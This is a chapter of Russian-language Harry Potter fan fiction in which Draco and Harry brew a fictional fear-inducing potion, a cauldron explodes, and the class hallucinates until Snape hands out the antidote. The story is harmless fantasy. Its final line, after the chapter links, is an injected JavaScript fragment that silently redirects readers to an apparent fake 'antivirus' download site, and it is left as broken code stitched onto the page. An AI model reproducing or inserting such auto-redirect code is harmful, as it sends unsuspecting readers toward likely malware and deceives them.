- Даже не мечтай! - снова взъярился Поттер. – Хагрид их обожает! Только попробуй стащить…

- Мне и не придется, - протянул слизеринец. – ты сам мне их принесешь. Ты же не думаешь, что все они выживут? Будет просто глупо не использовать их «на благо нашего дела».

Поттер ничего не ответил. Драко хотел продолжить пикировку, но не успел – его вниманием завладел появившийся в классе профессор. Смеясь и обмениваясь шутками с  вошедшими следом хаффлпафцами, тот положил книги и опустил на стол поднос с ингредиентами. На секунду встретившись с Драко глазами, мужчина посерьезнел, но тут же повернулся к остальным и лучезарно улыбнулся.

- Сегодня я решил предложить вам кое-что посложнее, - он открыл книгу на заложенной странице. – Галлюцинариум. Думаю, все вы можете предположить, для чего он используется. Кто-нибудь прочел учебник вперед?

Никто не удивился, когда Грейнджер подняла руку.

- Галлюцинариум заставляет человека видеть воплощение его худших страхов, - бодро заявила она. – Но, сэр, его рецепта нет в учебнике.

- И на то есть веская причина, - бодро отозвался Слагхорн. – Пять баллов Гриффиндору. Галлюцинариум – это вроде карманного боггарта, только жертва не сможет избавиться от него заклинанием «риддикулус». Действие этого зелья можно прекратить только приняв противоядие, но поскольку противоядие готовится целую неделю, большинство жертв сходит с ума, прежде чем прибудет помощь.

Открыв книгу, он начал записывать на доске порядок приготовления.

- Поскольку это довольно опасное зелье, его рецепта, разумеется, нет в учебниках. Но я думаю, вам будет очень полезно узнать, как готовится оно и его противоядие. Мы начнем с самого галлюцинариума. На всякий случай у меня припасен антидот, но пока вы не вздумаете выпить само зелье или надышаться испарениями, проблем быть не должно. А теперь разбейтесь по парам и постарайтесь не отравить друг друга.

Посмеявшись, студенты разошлись за ингредиентами. Драко тем временем изучал рецепт. Ничего удивительного, что тот показался ему знакомым. Он много раз видел, как мать готовила это зелье во время визитов Пожирателей, снова и снова убеждая  Волдеморта, что их семья по-прежнему ему полезна, и убивать их пока не стоит.

- О боже мой, - ахнул Слагхорн, пройдясь по классу и остановившись у стола Поттера. – Боюсь, мисс Боббин все еще в лазарете, Гарри, и на сегодня ты остался без пары. Но не волнуйся, я с удовольствием тебе помогу, - у него даже оказались с собой все нужные ингредиенты, которые он немедленно выгрузил на стол гриффиндорца.

Драко нахмурился. Может, он теперь и не студент, но Снейп и Дамблдор настаивали, чтобы он занимался, как обычно. И потом, Малфой не потерпит, чтоб его вот так игнорировали.

- Я буду работать с ним в паре, - заявил он. Несколько студентов удивленно посмотрели на него, а Поттер снова сердито зыркнул.

Нехотя обернувшись и презрительно глядя не на самого Драко, а куда-то в его сторону, Слагхорн заявил:

- Вы всего лишь гость, а не студент. Студенческие задания вас не касаются.

- Это Дамблдор вам сказал? – протянул Драко, тут же передумав быть милым и любезным, дабы привлечь внимание Слагхорна. Ему ничего не требовалось от этого болвана, и он не позволит обращаться с собой как с грязью, особенно после того, как он стольким пожертвовал. – Я слышал от него нечто совершенно противоположное. Может, нам стоит пойти и спросить?

- Ну… если мистер Поттер не возражает… Гарри, ты вовсе не обязан соглашаться.

- Я не возражаю, - отозвался Поттер тоном, ясно говорившим об обратном, и уселся рядом с Драко. Во взгляде гриффиндорца отражались противоречивые чувства: с одной стороны, он явно был рад избавиться от Слагхорна, с другой – теперь они с Малфоем были повязаны. Как только профессор удалился, дружески похлопав его по спине и похвалив его спортивный дух, Поттер наклонился к Драко и прошипел:

- Что, черт возьми, ты творишь?

- Изучаю новое зелье, - невозмутимо отозвался тот, придвигая к себе ингредиенты. – Мама никогда не разрешала мне готовить его самому, а с Северусом мы занимаемся другими, более сложными.

- Мне показалось, Слагхорн и это назвал сложным, - мрачно буркнул Поттер, глядя, как Драко отодвигает корень асфоделя, крокодильи глаза и стебли любистока в одну сторону, а чемерицу и кровь ворона – в другую. В котле уже было достаточно воды.

- Просто его нужно готовить в два приема, - пояснил слизеринец. – Сегодня утром я делал похожее. Если рецепт точный, я могу приготовить практически любое зелье, за очень немногими исключениями, - он пододвинул чемерицу и кровь к гриффиндорцу. – Вот, смешай их как следует, а я пока займусь остальным.

Начав измельчать крокодильи глаза, он еще раз взглянул на рецепт, чтобы убедиться, что делает все правильно. Драко не просто хотелось утереть Слагхорну нос, он знал, что на кон поставлена репутация его наставника. Хороший ученик при наличии достойного рецепта должен уметь приготовить все что угодно.

- А что ты не можешь приготовить?

Драко остановился и поднял взгляд:

- Что?

- Ты сказал, что не можешь приготовить некоторые зелья, - пояснил Поттер, неохотно перетирая листья с кровью. – Какие?

Драко ответил не сразу. Он бросил в котел корешки, измельченные глаза, как можно мельче нашинковал стебли и добавил их тоже. Помешал содержимое три раза, не забывая после каждого круга поворачивать черпак на четверть окружности назад. И только потом снова посмотрел на гриффиндорца.

- Ничего из того, что могло бы вам пригодиться, так что неважно.

- Ага… - Гарри отставил ступку и достал из сумки потрепанную книгу. Найдя нужную страницу, со множеством пометок на полях, он взглянул несколько раз на доску, потом опять в книгу, словно проверяя что-то. – Просто странно, что ученик Снейпа не может что-то приготовить.

Драко вовсе не хотелось объяснять, что Северус испробовал все способы, чтобы научить его варить любовные зелья, разве что не пытался вбить в него формулу силой. Но как он ни старался, Драко просто не понимал принцип их действия, и любая попытка приготовить нечто подобное заканчивалась катастрофой, достойной Лонгботтома.

- Не так странно, как видеть тебя в этом классе, - огрызнулся он. – Я думал, ты ненавидишь Зелья.

- Я ненавижу Снейпа, а не Зелья, - поправил его Поттер. – И потом, они мне нужны, чтоб стать аврором.

От удивления Драко чуть не прекратил помешивать варево.

- Ты хочешь быть аврором?!

Поттер кивнул.

- За каким дьяволом тебе хочется работать на Министерство?

Сначала Гарри не знал, что ответить. Он и сам много думал об этом, но Малфой казался по-настоящему озадаченным. Гарри удивила такая реакция.

- Я… мне казалось, это будет правильно. Когда-нибудь мне придется разобраться с Волдемортом, и я должен быть хорошо подготовлен.

Услышав это имя, Драко поморщился. Оно снова напомнило ему о побеге из ада, в который превратился его дом. Взяв ступку со смесью, приготовленной гриффиндорцем, он вылил все в котел. Жидкость стала молочно-белой и начала бурлить, несмотря на отсутствие огня под котлом.

- Авроры не играют в квиддич, - негромко сказал он. А взглянув на Поттера, понял, что тот уже думал о том, каково это - быть аврором, который никогда не играет.

- Ну вот, - Драко шагнул назад. – Готово.

Наклонившись над котлом, Гарри поглядел на тихонько булькающее зелье.

- Ты уверен?

- Попробуй, - предложил слизеринец в ответ. – У Слагхорна есть противоядие.

Поттер многозначительно посмотрел на него:

- Очень смешно. Я знаю, что ты не дословно следовал рецепту. Мешая, ты немного помешивал его в другую сторону.

- Соображаешь, Поттер. Работая с некоторыми ингредиентами нужно добавлять обратный оборот, иначе они могут взаимодействовать неправильно.

- Почему?

Драко обернулся удостовериться, что никто не может их подслушать. Несколько человек поглядывали на них, словно ожидая, что они с Поттером вот-вот бросятся друг на друга с кулаками, но все находились слишком далеко, чтобы что-то услышать.

- Мы верим, - прошептал он, и гриффиндорец сразу понял, о ком идет речь, - что когда в зелье используются животные ингредиенты, нужно помешивать его на четверть оборота на запад, где садится солнце, облегчая боль убитых животных и помогая их душам найти дорогу в темноте. Иначе дух может сделать зелье нестабильным.

- И что тогда?

Драко открыл рот, но взрыв за столом неподалеку ответил за него. Плотный белый дым моментально расползся по классу, словно туман, окутав оказавшихся рядом студентов, прежде чем те успели пошевелиться. Драко попытался добраться до двери, но ничего не было видно. Он в кого-то врезался и тот человек закричал. Потом закричали еще несколько, кто-то заплакал, зовя мать. Было слышно, как люди натыкаются друг на друга. Кто-то не на шутку перепугался и в панике принялся колотить другого, послышались болезненные вскрики. Мимо пронеслось несколько воспламеняющих заклинаний. Кто-то закричал о пауках, кто-то захныкал. Один вопль перекрыл все остальные:

- Темный маг! Среди нас Малфоевское отродье! Убить его! Найти его!

Драко мгновенно упал на пол и начал потихоньку отползать назад, пока не наткнулся на стену. Кровожадные призывы стали громче, к ним присоединялись все новые и новые голоса, пока безумие не охватило, казалось, весь Хогвартс. Драко крепко сжал палочку, но не стал колдовать, а потихоньку пополз на четвереньках вдоль стены, надеясь отыскать дверь. Пусть здесь нет окон, но он может спрятаться в подземных лабиринтах, выждать и попытаться выбраться из замка. Одна из его прабабок, Белладонна, однажды спряталась в болотном тумане, и хотя ей пришлось увидеть, как ее мать до смерти забили камнями, двигаясь очень тихо и медленно, она скрылась от толпы, жаждущей ее крови. Драко использовал все, чему научился во сне про нее, и, найдя, наконец, дверь, слегка ее приоткрыл.

Тут же кто-то рванул дверь на себя с другой стороны и применил рассеивающие чары. Драко попытался обезоружить неприятеля, но его заклинание блокировали, а его самого вытащили из класса и швырнули на пол так, что он ударился головой и выронил палочку. Юноша потянулся за ней, но нападающий призвал ее заклинанием, и вместо палочки рука Драко коснулась чего-то мягкого. Он сел и увидел рядом с собой тела родителей. Окровавленные и искалеченные, они лежали, словно пара тряпичных кукол, уставившись пустыми глазами в никуда. Значит, толпа добралась до них и теперь пришла за ним. Если бы Драко не был так напуган, он бы заплакал. Безоружный и беспомощный, ожидая неминуемой смерти, юноша поглядел вверх.

- Северус? – неверяще прошептал он. – За что?

Снейп уставился на крестника. Он понятия не имел, что привиделось Драко, но что бы это ни было, оно заставило мальчика оцепенеть от страха, не давая шевельнуться. Рядом с ним несколько студентов, избежавшие ядовитых испарений, пытались напоить противоядием тех, кому удалось выбраться из класса. Северус опустился на колени возле Драко и успокаивающе положил руку ему на плечо.

- Все совсем не так, - мягко произнес он. – Ты отравился, и тебе нужно принять противоядие.

Силясь вдохнуть, Драко отшатнулся.

- Ты убил их, - прошептал он. – Ты отвернулся…

- Я их не убивал, - возразил Снейп, решив подыграть. – Я бы никогда не повернулся против вас с отцом. Если не хочешь последовать за ними, выпей это, быстрее.

Драко уставился на пузырек в руке крестного. Северус никогда не лгал ему. Чувствуя, как по щекам потекли слезы, он взял пузырек и проглотил содержимое. Жидкость обожгла ему горло, на мгновение кровь словно превратилась в огонь, но постепенно тела родителей начали тускнеть, пока не исчезли совсем. Призывы к его убийству тоже прекратились, и единственными звуками остались плач студентов и встревоженные уговоры профессоров выпить антидот.

Не веря, что все обошлось, он оглянулся. Уизли съежился в объятьях у Грейнджер, а та пыталась убедить его, что пауки ушли прочь. Студентка из Хаффлпафа, которая в начале занятия улыбалась и шутила со Слагхорном, лежала окровавленная в обожженной одежде. Над ней склонилась озабоченная Помфри.

- Что… что случилось? – спросил Драко.

Снейп поднялся сам и рывком поднял крестника за воротник мантии, как маленького.

- Чей-то галлюцинариум взорвался и вы надышались ядовитыми испарениями. Слушай внимательно. Ступай, открой комнаты Слизерина. Всем, кто здесь находился, нужно как можно скорее принять душ, а наши помещения ближе всего. Возьми с собой Поттера, - и он вложил крестнику в ладонь его палочку.

Рассеянно кивнув, Драко оглянулся в поисках Поттера. Тот стоял неподалеку, глубоко дыша, и явно пытался взять себя в руки. Он не казался напуганным, как остальные. Он выглядел смирившимся.

- Иди, - Мастер зелий подтолкнул Драко, словно тот забыл, куда.

- Северус… - обернулся юноша. – Здесь ведь никто не знает, кто я такой, верно?

Догадавшись, что тревожит крестника, тот покачал головой:

- Никто, кроме тех нескольких человек, о ком тебе известно. Теперь ступайте.

Драко послушно кивнул, глянул на Поттера и направился к слизеринской гостиной. Гриффиндорец молча последовал за ним. Добравшись до входа, Драко сказал пароль и закрепил проем заклинанием, чтобы стена оставалась открытой. Однако когда он вошел внутрь, Поттер остался на месте.

- Идем, - сказал Драко, не желая оставаться один в темноте. – Нам нужно принять душ.

- Я подожду остальных, - упрямо возразил гриффиндорец. – Они не знают куда идти.

- Северус приведет их, - объяснил Драко. – Тебе нужно помыться, а то остатки яда подействуют снова.

Гарри не дрогнул, но его лицо напряглось.

- Снова?

- Дым был повсюду. Если ты случайно вдохнешь пыль, осевшую на твоей одежде, то все начнется заново.

Ожидая ответа гриффиндорца, Драко удивился, почему до сих пор не появились остальные. И  решил, что Северус все еще пытается разобраться, кто ранен, а кто просто напуган.

- Что ты видел? – вдруг спросил Поттер.

В любое другое время Драко ухмыльнулся бы и ничего не ответил. Но Нарциссы не было рядом, чтобы обнять и утешить его, а Поттер только что лицезрел свой собственный кошмар.

- Родителей, мертвых, - ответил юный Малфой. – И все вокруг кричали, требуя моей смерти.

 Гарри посмотрел на него, и на этот раз его взгляд не казался таким пронизывающим.

- Забавно. Мне привиделось почти то же самое.

Предыдущая глава   Оглавление   Следующая глава

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>